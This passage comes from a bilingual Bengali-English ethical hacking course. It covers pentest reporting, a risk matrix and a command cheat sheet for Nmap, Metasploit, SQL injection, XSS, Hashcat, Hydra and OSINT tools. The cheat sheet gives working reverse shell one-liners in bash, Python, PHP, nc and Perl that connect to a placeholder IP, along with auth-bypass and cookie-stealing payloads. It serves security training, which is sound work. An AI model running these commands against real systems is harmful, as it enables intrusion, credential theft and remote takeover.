  • CVSS Score ও Risk LevelCVSS Score & Risk Level
  • Affected System ও URLAffected System & URL
  • Description ও ImpactDescription & Impact
  • Proof of Concept (PoC)Proof of Concept (PoC)
  • Screenshot ও EvidenceScreenshot & Evidence
  • Remediation StepsRemediation Steps

Risk Rating MatrixRisk Rating Matrix

Risk LevelRisk Level CVSS উদাহরণExample সমাধানের সময়Remediation Time
CRITICAL9.0–10RCE, SQL Auth Bypass২৪ ঘন্টার মধ্যেWithin 24 hours
HIGH7.0–8.9SQLi, Privilege Escalation৭ দিনের মধ্যেWithin 7 days
MEDIUM4.0–6.9XSS, CSRF৩০ দিনের মধ্যেWithin 30 days
LOW0.1–3.9Information Disclosure৯০ দিনের মধ্যেWithin 90 days
INFO0.0Missing headersপরবর্তী maintenance-এAt next maintenance

Reporting ToolsReporting Tools

PlexTrac
Report Platform
Professional pentest report platformProfessional pentest report platform
Dradis
Collaboration
Team-based reporting ও note sharingTeam-based reporting & note sharing
Serpico
Open Source
Open-source pentest reportingOpen-source pentest reporting
CHAPTER 12
📋 Cheat Sheet — সম্পূর্ণ রেফারেন্সCheat Sheet — Complete Reference
সব গুরুত্বপূর্ণ কমান্ড এক জায়গায় — দ্রুত রেফারেন্সের জন্যAll important commands in one place — for quick reference

🗺️ Nmap Cheat Sheet

স্ক্যান টাইপScan Types
nmap -sS TARGETSYN StealthSYN Stealth
nmap -sV TARGETVersion detectVersion detect
nmap -A TARGETAggressive scanAggressive scan
nmap -p- TARGETAll 65535 portsAll 65535 ports
nmap -O TARGETOS detectionOS detection
nmap -sU TARGETUDP scanUDP scan
NSE Scripts
--script vulnVulnerability checkVulnerability check
--script http-enumWeb enumerationWeb enumeration
--script smb-vuln-*SMB vulnerabilitiesSMB vulnerabilities
--script ftp-anonAnonymous FTPAnonymous FTP
--script ssh-bruteSSH brute forceSSH brute force
--script dns-zone-transferZone transferZone transfer

🐉 Metasploit Cheat Sheet

MSF Console
search [keyword]Module খোঁজাSearch module
use [module]Module লোডLoad module
show optionsOptions দেখোView options
set RHOSTS [IP]Target set করোSet target
run / exploitExploit চালাওRun exploit
sessions -lSession listList sessions
Meterpreter
sysinfoSystem infoSystem info
getuidCurrent userCurrent user
getsystemPrivilege escalatePrivilege escalate
hashdumpPassword hashesPassword hashes
shellSystem shellSystem shell
run post/multi/recon/...Post modulePost module

🌐 Web Hacking Cheat Sheet

SQL Injection
' OR '1'='1'--Auth bypassAuth bypass
sqlmap -u "URL?id=1"Auto SQLiAuto SQLi
sqlmap -u URL --dbsDatabase listDatabase list
sqlmap -r req.txtRequest fileRequest file
UNION SELECT 1,2,3--Column countColumn count
XSS Payloads
<script>alert(1)</script>Basic XSSBasic XSS
<img src=x onerror=alert(1)>Img tag XSSImg tag XSS
<svg onload=alert(1)>SVG XSSSVG XSS
document.cookieCookie stealCookie steal
dalfox url http://targetAuto XSS scanAuto XSS scan

🔑 Password Cracking Cheat Sheet

Hashcat
hashcat -m 0MD5
hashcat -m 100SHA1
hashcat -m 1000NTLM
hashcat -m 1800sha512crypt
hashcat -a 0DictionaryDictionary
hashcat -a 3 ?l?l?l?lBrute forceBrute force
Hydra
hydra -l USER -P list ssh://IPSSH
hydra -l USER -P list ftp://IPFTP
hydra -l USER -P list rdp://IPRDP
hydra -L users -P list smb://IPSMB
-t 44 threads4 threads
-fStop on first hitStop on first hit

🐚 Reverse Shell Cheat Sheet

# Listener $ nc -lvnp 4444 ## Reverse Shells ## Bash: bash -i >& /dev/tcp/IP/4444 0>&1 Python: python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' PHP: php -r '$s=fsockopen("IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' NC: nc -e /bin/sh IP 4444 Perl: perl -e 'use Socket;$i="IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");' ## Upgrade Shell ## python3 -c 'import pty;pty.spawn("/bin/bash")' Ctrl+Z → stty raw -echo; fg → export TERM=xterm

🔍 OSINT & Recon Cheat Sheet

DNS & SubdomainDNS & Subdomain
amass enum -d domainSubdomain enumSubdomain enum
sublist3r -d domainSubdomain listSubdomain list
dig domain ANYDNS recordsDNS records
whois domainDomain infoDomain info
theHarvester -d domain -b allEmail harvestEmail harvest
Web Enumeration
gobuster dir -u URL -w listDirectory bruteDirectory brute
ffuf -w list -u URL/FUZZFast fuzzingFast fuzzing
nikto -h URLWeb vuln scanWeb vuln scan
whatweb URLTech detectionTech detection
wafw00f URLWAF detectionWAF detection

🏆 Practice PlatformsPractice Platforms

TryHackMe
BEGINNER FRIENDLY
Guided learning path, শুরুর জন্য সেরা। tryhackme.comGuided learning path, best for beginners. tryhackme.com
HackTheBox
INTERMEDIATE
Real-world machines, CTF-style challenge. hackthebox.comReal-world machines, CTF-style challenge. hackthebox.com
VulnHub
OFFLINE
Vulnerable VM download করে locally practice। vulnhub.comDownload vulnerable VMs to practice locally. vulnhub.com
PortSwigger
WEB SECURITY
Web security academy, free labs। portswigger.netWeb security academy, free labs. portswigger.net
PentesterLab
STRUCTURED
Hands-on web app pentesting exercisesHands-on web app pentesting exercises
Bugcrowd / HackerOne
BUG BOUNTY
Real company-র bug খুঁজে পুরস্কার নাওFind bugs in real companies and earn rewards
"The quieter you become, the more you can hear."

এই ডকুমেন্ট সম্পূর্ণ শিক্ষামূলক উদ্দেশ্যে। সবসময় authorized environment-এ এবং legal সীমার মধ্যে practice করো। This document is entirely for educational purposes. Always practice in an authorized environment and within legal boundaries.

v1.0 — Ethical Hacking & Penetration Testing Roadmap | Bilingual | 12 Chapters + Cheat Sheets